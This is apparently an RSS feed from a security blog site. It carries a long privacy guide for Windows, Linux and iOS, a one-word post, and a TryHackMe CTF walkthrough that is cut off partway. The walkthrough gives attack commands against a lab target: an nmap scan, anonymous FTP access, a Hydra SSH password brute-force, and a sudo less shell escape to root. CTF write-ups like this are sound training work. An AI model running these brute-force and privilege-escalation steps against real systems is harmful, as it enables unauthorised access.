Personalization   Device Use, disable everything. Also disable and remove anything under System   AI Components.&#xA;&#xA;Wi-Fi - Go under Network &amp; Internet   Wi-Fi. Below Hardware properties, enable Random hardware address. This can potentially force additional sign-ins on networks with portals, such as hotels, but is a good privacy step.&#xA;&#xA;Services - Disable SSDP Discovery and UPnP Device Host. Both enable discovery and communication with different types of devices on your network, so this could potentially disconnect a device. This does not apply to standard Bluetooth devices, so for most people this is a security risk more than anything.&#xA;&#xA;Browser&#xA;&#xA;Your only options for a browser are Chromium-based and Gecko-based (i.e., Chrome/Firefox-based). Chromium has several limitations that immediately shoot any option there in the foot, so in all practicality you should only be looking at Firefox and Firefox forks.&#xA;&#xA;Firefox itself isn&#39;t the worst, but has been making a move towards AI lately, and takes some effort to make more private. Refer to Privacy Guide&#39;s page on Firefox for more info if interested.&#xA;&#xA;There are a number of forks that are probably ok options for daily drivers, such as Waterfox and Zen Browser. They benefit in not having the AI enshittification, but being downstream, are slower to update than Firefox (and therefore potentially vulnerable). So, if you&#39;re going with a fork, I&#39;d recommend just going for one of the more privacy-focused options, unless you are strongly drawn to certain browser features (I know people praise Zen&#39;s UX, in particular, quite a bit).&#xA;&#xA;When it comes to truly private browsers, the forerunners are Librewolf, Mullvad, and Tor. Tor is the choice for the truly privacy conscious, as connections are routed over several relays, making it extremely difficult to match your browsing activity to you. Unfortunately, a number of websites block Tor users, and it can be a bit slower at times, so while I do recommend it for general browsing/searching, it probably won&#39;t be the best fit for daily use for most people.&#xA;&#xA;Mullvad is essentially just the Tor browser minus the relays, making it much more usable on the daily and more private out of the box than Librewolf. I should note, however, that Librewolf updates faster than Tor/Mullvad, meaning that it has an easier time blending in with general Firefox traffic. Therefore, I&#39;d either recommend Mullvad, or Librewolf with uBlock Origin, Port Authority, and Canvas Blocker, plus some settings tweaks. I&#39;ve gone back and forth on what I personally prefer, but I think really - if you want any non-privacy extensions, go with Librewolf. Otherwise, go with Mullvad.&#xA;&#xA;VPN/DNS&#xA;&#xA;As mentioned for iOS, I would recommend using Mullvad&#39;s &#34;base&#34; DNS for slightly improved privacy + some ad and tracker blocking. You can refer to their website for how to set it up via Wi-Fi hardware settings or via browser settings. Both are fairly straightforward, though browser is certainly a bit quicker to setup. Nonetheless, I would recommend setting it up on your Wi-Fi, so your whole system gets the benefits.&#xA;&#xA;As for VPNs, again, Mullvad, IVPN, and Proton VPN are the only real forerunners. I personally would not trust Proton all that much. Mullvad and IVPN are fairly similar as far as protocols go. IVPN has better split-tunneling, though, while Mullvad offers more devices on their basic plan (5 vs 3) and has better IPv6 and anti-censorship features. If you know you&#39;ll need a few apps to always be split-tunneled, I&#39;d recommend IVPN, otherwise I&#39;d recommend Mullvad. (And if you think you desperately need to use a VPN for something, probably just use Tor. VPNs are far from infallible).&#xA;&#xA;Additional Software&#xA;&#xA;BleachBit - The primary use of BleachBit is to clear space, with some secondary privacy gains. Namely, BleachBit clears data fragments, temporary files, and even (optionally) browser caches, saved passwords, etc. This can potentially clear several gigabytes of space, and the cleaning of data fragments ensures that deleted files are well and truly deleted.&#xA;&#xA;ExifTool - A command-line utility to strip metadata from photos and videos. Would highly recommend using it before posting stuff publicly.&#xA;&#xA;KeePassXC - My preferred password manager. Bitwarden may be a better pick if you want to sync passwords across devices, but KeePass is the goat for local password management.&#xA;&#xA;Lutris - Not a privacy thing, but too handy for Linux not to mention. It lets you play all your games! It really integrates everything; you can manually add games in addition to linking all of the major game stores. With the built in compatibility/emulation tools, you can launch everything right from Lutris. Might require a little setup in some cases (particularly for manually added games), but honestly super functional.]]&gt;</description>
      <content:encoded><![CDATA[<p>This guide will cover various recommendations for Windows/Linux/iOS with an eye for free, open-source, private software and privacy-enhancing tips. Given the amount I&#39;ll be covering, it will not be in maximum depth (i.e., I do not always offer all possible options or my full reasoning for recommendations). Please refer to my <a href="https://riverrambles.substack.com/p/improving-your-pc-privacy" rel="nofollow">PC Privacy Guide</a>, <a href="https://riverrambles.substack.com/p/improving-your-iphone-privacy" rel="nofollow">iOS Privacy Guide</a>, and <a href="https://riverrambles.substack.com/p/de-googling-your-life" rel="nofollow">De-Googling Guide</a> back on my old Substack for more focused guides.</p>

<p>And yes, non-corporate Linux and Graphene is vastly preferable to Windows and iOS. Your privacy on Windows and iOS is inherently compromised. You can, however, reduce data collection in some marginal ways, and you certainly can improve the external privacy of your system (i.e., reduce the amount that web trackers are monitoring you and such). Frankly, I do not yet have sufficient experience with either to really cover them in detail, nor do I think that installing a new OS is a privacy tip that most people will just up and follow. This article is aimed towards people who may not be willing to go that far yet. I do have some brief comments on OS options on.</p>

<p>I&#39;ll hopefully be putting out a follow-up post to this fairly soon, so stay posted for that. It&#39;ll be more FOSS and recommendations of cool tools rather than what I consider to be essential privacy steps.</p>

<h2 id="additional-resources">Additional Resources</h2>

<p>Between these resources, you pretty much have this whole page and then some (excluding a small handful of more niche tips I have in here).</p>
<ul><li><p><a href="https://www.privacyguides.org/en/tools/" rel="nofollow">Privacy Guides</a> and <a href="https://avoidthehack.com/#recs" rel="nofollow">Avoid the Hack</a> – Websites managed by people familiar with the privacy world, and so tend to have much better recommendations than similar sites. You can find recommended browsers, operating systems, email providers, etc.</p></li>

<li><p><a href="https://github.com/lissy93/awesome-privacy" rel="nofollow">Awesome Privacy</a> – A “curated list” of privacy &amp; security-focused software and services. Does not have the detail that Privacy Guides typically does, but it also has more recommendations than they do (while keeping recommendations at a decent quality).</p></li>

<li><p><a href="https://www.oo-software.com/en/" rel="nofollow">O&amp;O Software</a> – Makers of a number of tools that can make Windows more secure/private. Many of the tools are paid, but AppBuster and ShutUp10++ are both free, and I highly recommend ShutUp10++ in particular for disabling Windows bloat/spyware.</p></li>

<li><p>EFF’s <a href="https://coveryourtracks.eff.org/" rel="nofollow">Cover Your Tracks</a> – A tool that attempts to fingerprint your browser in order to determine how protected you are. Extremely helpful for testing whether features are truly improving your privacy. <a href="https://amiunique.org/fingerprint" rel="nofollow">Am I Unique</a> and <a href="https://browserleaks.com/" rel="nofollow">BrowserLeaks</a> are also very useful for the same purpose.</p></li>

<li><p><a href="https://privacytests.org/" rel="nofollow">Privacy Tests</a> – A website which compares open-source tests of browser privacy. It is one of the easiest ways to quickly compare the major browsers.</p></li>

<li><p>Avoid the Hack’s <a href="https://browsers.avoidthehack.com/" rel="nofollow">Browser Comparison Tool</a> – Similar to Privacy Tests, but more generalized and with information on more browsers.</p></li></ul>

<h2 id="de-googling">De-Googling</h2>

<p>While you may still need a Google account for certain things, you certainly can adjust settings to improve privacy and migrate most services away from Google.</p>

<p>For tweaks, most of the settings you&#39;ll want will be under <strong>Data &amp; Privacy</strong> in <a href="https://myaccount.google.com/" rel="nofollow">Google Account</a>. You&#39;ll ideally want to disable everything under <strong>Things you’ve done and places you’ve been</strong>. You&#39;ll also want to limit the amount of info shared under <strong>Info you can share with others</strong> and cut down on the number of third-party services under <strong>Data from apps and services you use</strong>.</p>

<p>Beyond the general tweaks, I&#39;d highly recommend disabling all “personalization” and “smart” features, as nowadays that is often cover for AI-powered data harvesting. You can find a number of these features under <a href="https://mail.google.com/mail/u/0/#settings/general" rel="nofollow">general Gmail settings</a>.</p>

<p>As for migration, Google&#39;s <a href="https://myaccount.google.com/dashboard" rel="nofollow">Dashboard</a>, <a href="https://takeout.google.com/" rel="nofollow">Takeout</a>, and <a href="https://myaccount.google.com/deleteservices" rel="nofollow">Delete Services</a> will be your friends. Dashboard shows a general overview of your data and services, Takeout allows you to export your data, and Delete Services, of course, allows you to delete things.</p>

<h3 id="recommendations">Recommendations</h3>
<ul><li><p><strong>Google Search</strong> –&gt; <strong>Startpage</strong>, <strong>DuckDuckGo</strong>, or <strong>SearXNG</strong>. Startpage is a simple Google and Bing wrapper, so should work well for most users. DDG has been implementing AI features I&#39;m really not a fan of, but it does have some very handy features, an onion service, and a version of the <a href="https://noai.duckduckgo.com" rel="nofollow">engine without AI</a>, so <strong>DDG NoAI</strong> is my personal choice. SearXNG is the most versatile of the 3, even including search functions for torrents and other specifics, but service can be a bit spotty in my experience.</p></li>

<li><p><strong>Gmail</strong> –&gt; <strong>Tuta Mail</strong> or <strong>Mailbox Mail</strong>, and/or <strong>Thunderbird</strong>. Tuta and Mailbox Mail are both encrypted email providers that will be a significant step up from Gmail. That being said, bear in mind that the main gain is privacy in respect towards the provider – end-to-end encryption, by definition, is only ever enabled for these services if the person you are emailing uses a compatible encryption service. I&#39;ve personally heard better things about <strong>Tuta</strong>&#39;s user experience, and it&#39;s what I personally use. If you continue to use Gmail, I&#39;d recommend using <strong>Thunderbird</strong> as an email client, as it will provide some modest improvements over accessing your Gmail on the web (and does enable E2EE if you&#39;re looking to do so).</p></li>

<li><p><strong>Google Maps</strong> –&gt; <strong>Open Street Map</strong>/<strong>Organic Maps</strong> or <strong>Apple Maps</strong>. Open Street Map is community-developed, which is great, but means that it isn&#39;t always as up-to-date. Organic Maps is the one iOS app for OSM that I know of (though there may be others), and it doesn&#39;t have the best routing features, nor is it always up-to-date with OSM, even. For most people with iPhones, I&#39;d recommend just using Apple Maps, as it is marginally more private than Google Maps, and much more comparable in features/map data.</p></li>

<li><p><strong>Google Drive</strong> –&gt; <strong>CryptPad</strong> or <strong>LibreOffice</strong>. Privacy Guides <a href="https://www.privacyguides.org/en/document-collaboration/" rel="nofollow">only recommends <strong>CryptPad</strong></a>, so it&#39;s my primary choice as well. <strong>Filen</strong> is a good second choice, especially if you need more than 1 free GB (Filen offers 10). <strong>LibreOffice</strong> is a decent primarily offline replacement, though as consequence it&#39;s more a Microsoft Office replacement than a Google one.</p></li>

<li><p><strong>Google Photos</strong> – <strong>Ente</strong>. If you&#39;re wanting a specifically online photo/video manager, Ente is your best bet. Naturally, you could also simply store things offline or use one of the Drive replacements.</p></li>

<li><p><strong>YouTube</strong> –&gt; <strong>FreeTube</strong>. You have a lot of options for YouTube replacements, including alternative front-ends like Invidious and Fediverse equivalents like PeerTube. If you want to keep your subscriptions, however, a client is the way to go (Invidious had some support for accounts/subs, but I believe that&#39;s largely died). FreeTube is not the only client option, but it is easily my favorite. You can import your subcriptions quite easily, but for playlists you may have to import from URLs. Since Watch Later cannot be made public, to import it from URL you will have to copy it to another playlist, then import that playlist. The extension <strong>Multiselect for YouTube</strong> makes this fairly quick. FreeTube will occasionally break for a short time after YouTube changes things, but generally it works quite well, and has some fantastic features.</p></li>

<li><p><strong>Google News</strong> –&gt; <strong>NetWireNews</strong> (iOS) or <strong>Feeder</strong> (Android). I&#39;d highly recommend using RSS for your news aggregation. It gives you much better control, and you can avoid ads and all other nonsense. You can typically add news sources simply by pasting in their URL, though occasionally you may need to add /rss or /feed to the end.</p></li>

<li><p><strong>Google Keep</strong> –&gt; <strong>Obsidian</strong>. It has so many great features; I truly can&#39;t recommend it enough.</p></li>

<li><p><strong>Google Meet</strong> –&gt; <strong>Jitsi Meet</strong>. Naturally, you may not always have a choice, but Jitsi is the preferred option for secure video calls.</p></li></ul>

<h3 id="hardware">Hardware</h3>

<p>Avoid smart home devices at any cost, end of story. For a phone, ideally, I&#39;d recommend a Pixel with <strong>GrapheneOS</strong>, the gold-standard for secure mobile OSs (Graphene has plans to be available on other phones, but this is still in the works). Privacy Guides also has some <a href="https://www.privacyguides.org/en/android/general-apps" rel="nofollow">app recommendations</a> and advice on <a href="https://www.privacyguides.org/en/android/obtaining-apps/" rel="nofollow">how best to obtain apps</a> (of particular note – avoid the Google Play store, and F-Droid isn’t the best either).</p>

<h2 id="ios-recommendations">iOS Recommendations</h2>

<h3 id="privacy-and-security-settings">Privacy and Security Settings</h3>

<p>First, something you might not want to hear – go to <strong>General –&gt; AirDrop</strong> and set to <strong>Receiving Off</strong>. In other words, you should disable <strong>AirDrop</strong>. It may be fun, but it is an attack vector that is trivially easy to exploit. For activists, I would likewise suggest <strong>disabling Face ID</strong> (Privacy Guides has a “<a href="https://www.privacyguides.org/articles/2025/01/23/activists-guide-securing-your-smartphone/#minimize-your-stored-data" rel="nofollow">Protestors Guide to Smartphone Security</a>” that is very worth checking out).</p>

<p>Shut off everything under <strong>Analytics and Improvements and Apple Advertising</strong>. Under <strong>Tracking</strong>, disable <strong>Allow Apps to Request to Track</strong> and disable permissions for all the apps that requested it.</p>

<p>Under <strong>Location Services</strong>, review which apps have access and disable or limit any unnecessary ones. This should include location logging for the <strong>Camera</strong> app! Next, at the bottom of <strong>Location Services</strong> you’ll want to go into <strong>System Services</strong>. You can disable the vast majority of these services. <strong>Emergency Calls and SOS</strong>, <strong>Find My iPhone</strong>, and <strong>Share My Location</strong> should probably be left enabled for most people. Disabling <strong>Networking and Wireless</strong> can potentially impact performance, since you may not always be connected to the closest tower. Personally, I haven’t noticed a difference. Everything under <strong>Product Improvement</strong> (<strong>iPhone Analytics</strong>, etc) should be disabled as well.</p>

<p>Still under <strong>System Services</strong>, I would also highly recommend disabling <strong>Significant Locations</strong>. This feature logs locations you visit in order to determine the titular “significant” locations, allowing it to effectively have map pins for your home, work, favorite grocery store, friends’ apartments, etc. This will clear certain Apple Maps saved locations, but I would recommend it regardless.</p>

<p>Lastly, I&#39;d recommend going through <strong>Safety Check</strong> to see and confirm/retract information you are still sharing. Enabling the <strong>App Privacy Report</strong> can also be useful, as it logs what domains apps are contacting. (Note that it&#39;ll be on you to go back later and see what apps are regularly contacting Facebook; it&#39;s just a passive report).</p>

<h3 id="icloud">iCloud</h3>

<p>Obviously, anything in your iCloud can potentially be accessed by Apple. Thankfully, Apple does offer end-to-end encryption for iCloud, though it is disabled by default. Be aware that enabling it means that if you ever fully get locked out of your phone / iCloud, Apple will not be able to retrieve your stuff.</p>

<p>Under <strong>iCloud</strong>, disable anything you don’t need backed up (and consider that that could mean everything). You may also want to consider disabling <strong>Access iCloud Data on the Web</strong> at the bottom. Most crucially, enable <strong>Advanced Data Protection</strong>.</p>

<h3 id="network">Network</h3>

<p>Go to <strong>Wi-Fi</strong>, then select the <strong>i</strong> by your Wi-Fi network. Scroll down to <strong>Private Wi-Fi Address</strong>. Set this to <strong>Rotating</strong> if it isn’t already, and below it enable <strong>Limit IP Address Tracking</strong>. While your iPhone generally <em>will</em>, by default, generate a different address for each network, it may not be set to randomize on the same network. Rotating is generally better, but for networks that force you through a portal (like hotels), it may make you sign back in each time. (This is why, you’ll note, these settings are individual to each network).</p>

<p>I&#39;d recommend setting up a private DNS, with <strong>Mullvad&#39;s “base” DNS</strong> being my top recommendation. This will help keep your browsing a little more private, with the added benefit of blocking ads, trackers, and malware. You can follow <a href="https://mullvad.net/en/help/dns-over-https-and-dns-over-tls#ios" rel="nofollow">Mullvad&#39;s instructions</a> on setting it up. It is fairly straightforward, but do be sure to do the seemingly pointless step of selecting the profile in Files (step 7), otherwise the Profile Download button will not appear in step 9.</p>

<p>A VPN isn&#39;t a bad idea either, though in my experience mobile VPNs can be a bit buggy at times. <strong>Proton VPN</strong> is the only good free option I know of (even though I don&#39;t wholly trust Proton), while <strong>Mullvad VPN</strong> would be my recommendation for anyone who can pay for a VPN. <strong>IVPN</strong> is pretty good as well, and fairly comparable to Mullvad. I would strongly recommend against any VPN that isn&#39;t those 3.</p>

<h3 id="browser">Browser</h3>

<p>While there are an array of options for iOS browsers, the choices are in actuality limited by the restrictions that Apple places on browsers that are not Safari. Brave, DuckDuckGo, and Firefox Focus do all have some improvements over base Safari. So barring any tweaking, I&#39;d recommend <strong>DDG</strong> as a daily driver and <strong>Firefox Focus</strong> if you want permanent incognito (I do not recommend Brave, both for the crypto BS and because the CEO is homophobic).</p>

<p>Overall, however, if you truly want a private browser, <strong>Safari</strong> is the best choice. I would recommend following Privacy Guide&#39;s <a href="https://www.privacyguides.org/en/mobile-browsers/#safari-ios" rel="nofollow">tips for settings</a> to harden it, excluding their recommendation to enable FaceID for private browsing (I don&#39;t recommend biometrics in general, since they potentially allow access without your consent).</p>

<p>I would also highly recommend installing either <strong>uBlock Origin Lite</strong> or <strong>wBlock</strong> as content-blocking Safari Extensions. uBlock Origin is the gold-standard content blocker, but unfortunately only the “Lite” version is available on Safari. The main limitations are in customization, so uBlock Origin Lite is probably great for most people. <strong>wBlock</strong> does edge it out a bit for me personally, as it is more customizable and (at least claims) lower resource usage.</p>

<h3 id="other-apps-reccs">Other Apps/Reccs</h3>

<p>Use <strong>Signal</strong> whenever possible. Other messaging apps like WhatsApp or Telegram are marginally more secure than iMessage, but are significantly less secure than Signal.</p>

<p>Do not include locations on images, and ideally, go a step further and scrub the metadata entirely. You can create a button via <strong>Shortcuts</strong> to do this <a href="https://discuss.privacyguides.net/t/exif-removal-tools-ios-no-apps-required/16664" rel="nofollow">pretty easily</a>. Note that you’ll need separate shortcuts for photos, videos, and GIFs. Making a GIF shortcut is very similar to the photos shortcut, but instead of using Convert, you use Make GIF. You could also just install an app to scrub metadata, but I&#39;d recommend against it, as you don&#39;t know what is truly being done with your photos.</p>

<p>As mentioned, you can use <strong>Organic Maps</strong> for a totally private maps, though it isn&#39;t amazing. Again, Apple Maps is at least marginally better than Google Maps.</p>

<h2 id="pc-privacy">PC Privacy</h2>

<p>Naturally, many of my De-Googling recommendations will be relevant here, so refer back to that if needed (for Office/Drive replacements, search engines, email, etc).</p>

<h3 id="operating-systems">Operating Systems</h3>

<p>I&#39;m still a relative noob to Linux, but I have some potential distro recommendations – or, rather, Privacy Guides does. They recommend Fedora, openSUSE Tumbleweed, Arch Linux, and NixOS for privacy-conscious distributions. Of those, <strong>Fedora</strong> is the most beginner-friendly (which may not be saying too much if you have 0 command-line or Linux experience).</p>

<p>You&#39;ll also often have a choice of desktop environment, such as GNOME, KDE, Cinnamon, LXQt, and Xfce. Across both distros and desktop environments, you may see that some are considered “lightweight”, meaning that they are less resource intensive, and so may be good for older hardware.</p>

<p>I have only really used <strong>Lubuntu</strong>, a lightweight fork of Ubuntu using the LXQt desktop environment (I wouldn&#39;t recommend Ubuntu itself, as it&#39;s become pretty corporate). I put it on several old laptops and it&#39;s been pretty nice, though I think I&#39;d probably use <strong>Fedora KDE</strong> if I wanted a true daily driver (greater privacy and support as far as I know, probably lower likelihood to run into some of the issues I&#39;ve hit).</p>

<p>You can get most OSs “live”, meaning you can put them on a USB and boot from them without overwriting your true OS. Very handy for testing, and actually pretty easy! There are also some OSs that are purely live, such as <strong>Tails</strong>, which is an OS designed specifically for maximum privacy, routing connections through Tor and wiping data when done. You can also use Virtual Machines to run different OSs, including <strong>Whonix</strong>, which is similar to Tails, but with greater security features  (and exclusively runs inside a VM).</p>

<h3 id="windows-settings">Windows Settings</h3>

<p>Again, I’d highly recommend anyone who feels comfortable to jump to Linux to do so (and consider testing out a live OS, switching over may be easier than you think!). Otherwise, software like <a href="https://www.revi.cc/download" rel="nofollow">Revision</a> can “clean” existing Windows 10/11. Please tread carefully if you’re interested; I can&#39;t attest much to functionality or trustworthiness. There are other options available for cleaner installs, but if you&#39;re willing to reinstall your OS, I would again highly encourage switching to Linux (compatibility has improved dramatically in recent years!).</p>

<p>Barring messing with your operating system directly, though, there are certainly still important steps you can take. To start, use <a href="https://www.oo-software.com/en/shutup10" rel="nofollow"><strong>ShutUp10++</strong></a> to disable invasive Windows features – it will provide a GUI with recommendations and explanations for what should be disabled. Some following settings changes will be redundant with ShutUp10++.</p>

<p><strong>Privacy and Security</strong> – In settings, go under <strong>Privacy &amp; Security</strong>. Under <strong>General</strong>, turn off the <strong>Advertising ID</strong> in particular, along with the other settings in that section (except notifications). Disable everything under <strong>Diagnostics &amp; Feedback</strong> and <strong>Text &amp; Image Generation</strong>. Under <strong>Location</strong>, turn off <strong>Let Apps Access Your Location</strong> (they can still see approximate location; this just gets rid of precise location).</p>

<p><strong>General Settings</strong> – Under <strong>Personalization</strong> &gt; <strong>Device Use</strong>, disable everything. Also disable and remove anything under <strong>System</strong> &gt; <strong>AI Components</strong>.</p>

<p><strong>Wi-Fi</strong> – Go under <strong>Network &amp; Internet</strong> &gt; <strong>Wi-Fi</strong>. Below Hardware properties, enable <strong>Random hardware address</strong>. This can potentially force additional sign-ins on networks with portals, such as hotels, but is a good privacy step.</p>

<p><strong>Services</strong> – Disable <strong>SSDP Discovery</strong> and <strong>UPnP Device Host</strong>. Both enable discovery and communication with different types of devices on your network, so this could potentially disconnect a device. This does not apply to standard Bluetooth devices, so for most people this is a security risk more than anything.</p>

<h3 id="browser-1">Browser</h3>

<p>Your only options for a browser are Chromium-based and Gecko-based (i.e., Chrome/Firefox-based). Chromium has several limitations that immediately shoot any option there in the foot, so in all practicality you should only be looking at Firefox and Firefox forks.</p>

<p>Firefox itself isn&#39;t the worst, but has been making a move towards AI lately, and takes some effort to make more private. Refer to Privacy Guide&#39;s <a href="https://www.privacyguides.org/en/desktop-browsers/#firefox" rel="nofollow">page on Firefox</a> for more info if interested.</p>

<p>There are a number of forks that are probably ok options for daily drivers, such as <strong>Waterfox</strong> and <strong>Zen Browser</strong>. They benefit in not having the AI enshittification, but being downstream, are slower to update than Firefox (and therefore potentially vulnerable). So, if you&#39;re going with a fork, I&#39;d recommend just going for one of the more privacy-focused options, unless you are strongly drawn to certain browser features (I know people praise Zen&#39;s UX, in particular, quite a bit).</p>

<p>When it comes to truly private browsers, the forerunners are <strong>Librewolf</strong>, <strong>Mullvad</strong>, and <strong>Tor</strong>. Tor is the choice for the truly privacy conscious, as connections are routed over several relays, making it extremely difficult to match your browsing activity to you. Unfortunately, a number of websites block Tor users, and it can be a bit slower at times, so while I do recommend it for general browsing/searching, it probably won&#39;t be the best fit for daily use for most people.</p>

<p>Mullvad is essentially just the Tor browser minus the relays, making it much more usable on the daily and more private out of the box than Librewolf. I should note, however, that Librewolf updates faster than Tor/Mullvad, meaning that it has an easier time blending in with general Firefox traffic. Therefore, I&#39;d either recommend <strong>Mullvad</strong>, or <strong>Librewolf</strong> with <strong>uBlock Origin</strong>, <strong>Port Authority</strong>, and <strong>Canvas Blocker</strong>, plus some settings tweaks. I&#39;ve gone back and forth on what I personally prefer, but I think really – if you want any non-privacy extensions, go with <strong>Librewolf</strong>. Otherwise, go with <strong>Mullvad</strong>.</p>

<h3 id="vpn-dns">VPN/DNS</h3>

<p>As mentioned for iOS, I would recommend using <strong>Mullvad&#39;s “base” DNS</strong> for slightly improved privacy + some ad and tracker blocking. You can refer to their website for how to set it up via <a href="https://mullvad.net/en/help/dns-over-https-and-dns-over-tls#win11" rel="nofollow">Wi-Fi hardware settings</a> or via <a href="https://mullvad.net/en/help/dns-over-https-and-dns-over-tls#browsers" rel="nofollow">browser settings</a>. Both are fairly straightforward, though browser is certainly a bit quicker to setup. Nonetheless, I would recommend setting it up on your Wi-Fi, so your whole system gets the benefits.</p>

<p>As for VPNs, again, Mullvad, IVPN, and Proton VPN are the only real forerunners. I personally would not trust Proton all that much. Mullvad and IVPN are fairly similar as far as protocols go. IVPN has better split-tunneling, though, while Mullvad offers more devices on their basic plan (5 vs 3) and has better IPv6 and anti-censorship features. If you know you&#39;ll need a few apps to always be split-tunneled, I&#39;d recommend <strong>IVPN</strong>, otherwise I&#39;d recommend <strong>Mullvad</strong>. (And if you think you desperately <em>need</em> to use a VPN for something, probably just use Tor. VPNs are far from infallible).</p>

<h3 id="additional-software">Additional Software</h3>

<p><strong>BleachBit</strong> – The primary use of BleachBit is to clear space, with some secondary privacy gains. Namely, BleachBit clears data fragments, temporary files, and even (optionally) browser caches, saved passwords, etc. This can potentially clear several gigabytes of space, and the cleaning of data fragments ensures that deleted files are well and truly deleted.</p>

<p><strong>ExifTool</strong> – A command-line utility to strip metadata from photos and videos. Would highly recommend using it before posting stuff publicly.</p>

<p><strong>KeePassXC</strong> – My preferred password manager. Bitwarden may be a better pick if you want to sync passwords across devices, but KeePass is the goat for local password management.</p>

<p><strong>Lutris</strong> – Not a privacy thing, but too handy for Linux not to mention. It lets you play all your games! It really integrates everything; you can manually add games in addition to linking all of the major game stores. With the built in compatibility/emulation tools, you can launch everything right from Lutris. Might require a little setup in some cases (particularly for manually added games), but honestly super functional.</p>
]]></content:encoded>
      <author>River</author>
      <guid>https://infosec.press/read/a/gscux7jgws</guid>
      <pubDate>Tue, 20 Jan 2026 19:42:50 +0000</pubDate>
    </item>
    <item>
      <title>hi</title>
      <link>https://infosec.press/kierwin/hi</link>
      <description>&lt;![CDATA[hi]]&gt;</description>
      <content:encoded><![CDATA[<p>hi</p>
]]></content:encoded>
      <author>kierwin</author>
      <guid>https://infosec.press/read/a/44j57mmgbv</guid>
      <pubDate>Tue, 20 Jan 2026 05:56:19 +0000</pubDate>
    </item>
    <item>
      <title>Brooklyn Nine Nine CTF | Walkthrough</title>
      <link>https://infosec.press/plutogazer/brooklyn-nine-nine-ctf-walkthrough</link>
      <description>&lt;![CDATA[This is a Walkthrough for the Brooklyn Nine Nine Capture The Flag TryHackMe room. The writeup is meant to offer short and concise solutions by using a bigger font and titling as &#34;Task Number&#34;, but also offering an extended explanation as subheaders for those interested in finding out more about the solution to a specific task.&#xA;&#xA;Starting  &#xA;&#x9;&#x9;&#xA;Let&#39;s start with the basics - enumerate the open ports in the target. Let&#39;s use nmap.&#xA;nmap -sV MACHINEIP&#xA;&#xA;Host is up (0.00020s latency).&#xA;Not shown: 997 closed ports&#xA;PORT   STATE SERVICE VERSION&#xA;21/tcp open  ftp     vsftpd 3.0.3&#xA;22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)&#xA;80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))&#xA;Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linuxkernel&#xA;index page:&#xA;&#xA;We find three open ports with three services: SSH, FTP, and a web server.&#xA;I tried enumerating the web server&#39;s directories to see if there was something of interest, but it only contains a background image.&#xA;&#xA;Task 1: User flag&#xA;Because there was nothing but the index, any hint must be in the page itself.&#xA;&#xA;Check the web server&#39;s main page&#39;s source. Alternatively, open developer tools and inspect the index, you will find the following comment:  &#xA;&#xA;blockquote&#xA; Have you ever heard of steganography? &#xA;/blockquote&#xA;Nice hint. So the background image might not be just a background image...&#xA;In the source page we will find the following line:&#xA;&#xA;background-image: url(&#34;brooklyn99.jpg&#34;);&#xA;The fact that url() specifies the image directly means that it can be found in the same path we&#39;re at right now.&#xA;&#xA;Download the background image&#xA;I used wget for this.&#xA;wget http://MACHINEIP/brooklyn99.jpg&#xA;&#xA;Use steganography to uncover the secret behind the image. I decided to use stegseek&#xA;&#xA;Note: I was using TryHackMe&#39;s Attackbox. Stegseek, however, is not included in the Attackbox - I had to install it, as the steganography tool that was available has been deprecated.&#xA;&#xA;stegseek brooklyn99.jpg&#xA;&#xA;We get the following message:&#xA;blockquote&#xA;[i] Found passphrase: &#34;[REDACTED]&#34;&#xA;/blockquote&#xA;&#xA;Decode the image with the password we found. I used https://futureboy.us/stegano/decinput.html to do this.&#xA;&#xA;This shows us the following message:&#xA;blockquote&#xA;Holts Password:&#xA;&#xA;[REDACTED]&#xA;&#xA;Enjoy!!&#xA;/blockquote&#xA;&#xA;Time to get access.&#xA;&#xA;Gain access the target According to the creator, there are two ways to gain access. I assume this is either directly through SSH with holt&#39;s password or the long way around, with the password of the user we will find right now. I chose the long way around: We will do this with the FTP port we found.&#xA;&#xA;ftp MACHINEIP&#xA;It will tell us that the server only accepts anonymous connections. Let&#39;s attempt a new connection, with &#34;anonymous&#34; as the user.&#xA;&#xA;ftp  open MACHINEIP&#xA;&#xA;Connected to MACHINEIP.&#xA;220 (vsFTPd 3.0.3)&#xA;Name (MACHINEIP:root): anonymous&#xA;331 Please specify the password.&#xA;Password:&#xA;230 Login successful.&#xA;&#xA;Examine the server&#39;s contents with the dir FTP command.&#xA;&#xA;ftp  dir&#xA;&#xA;200 PORT command successful. Consider using PASV.&#xA;150 Here comes the directory listing.&#xA;-rw-r--r--    1 0        0             119 May 17  2020 notetojake.txt&#xA;226 Directory send OK.&#xA;&#xA;Download the contents with the get FTP command. &#xA;&#xA;ftp  get notetojake.txt&#xA;&#xA;The file says the following:&#xA;&#xA;blockquote&#xA;From Amy,&#xA;&#xA;Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine&#xA;/blockquote&#xA;&#xA;Now we know a way to actually access to the system. Assuming Amy and Jake are both existing users, and Amy is telling us Jake has a weak password, let us see if we can brute-force Jake&#39;s password.&#xA;&#xA;Attempt to gain access through SSH by brute-forcing Jake&#39;s password.&#xA;I will use Hydra for this.&#xA;&#xA;hydra -l jake -P /usr/share/wordlists/rockyou.txt MACHINEIP ssh&#xA;It took Hydra about one second to find it. So, knowing the password:&#xA;&#xA;Log in to the system with Jake&#39;s password.&#xA;&#xA;ssh jake@MACHINEIP&#xA;&#xA;Find the User flag. You can look for it manually, or use the following command:&#xA;find /home/ -name user.txt 2  /dev/null&#xA;&#xA;Task 2: Root flag&#xA;To access the Root flag (likely at /root/) we will need root access.&#xA;&#xA;Find a way to escalate privileges. Check what can the current user run as root.&#xA;&#xA;sudo -l -l&#xA;&#xA;We get the following information:&#xA;&#xA;Matching Defaults entries for jake on brooklyninenine:&#xA;    envreset, mailbadpass,&#xA;    securepath=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin&#xA;&#xA;User jake may run the following commands on brooklyninenine:&#xA;&#xA;Sudoers entry:&#xA;    RunAsUsers: ALL&#xA;    Options: !authenticate&#xA;    Commands:&#xA;&#x9;/usr/bin/less&#xA;&#xA;So, it seems jake can run less as root.&#xA;&#xA;Find a way to exploit this vulnerability.&#xA;I searched GTFObins and found the following command: &#xA;&#xA;    sudo less /etc/profile&#xA;    !/bin/sh&#xA;    &#xA;This, indeed, allowed us to escalate privilege and act as the root user.&#xA;&#xA;Find the root flag.&#xA;&#xA;find / -name root.txt 2  /dev/null&#xA;&#xA;Eventually, we will find where 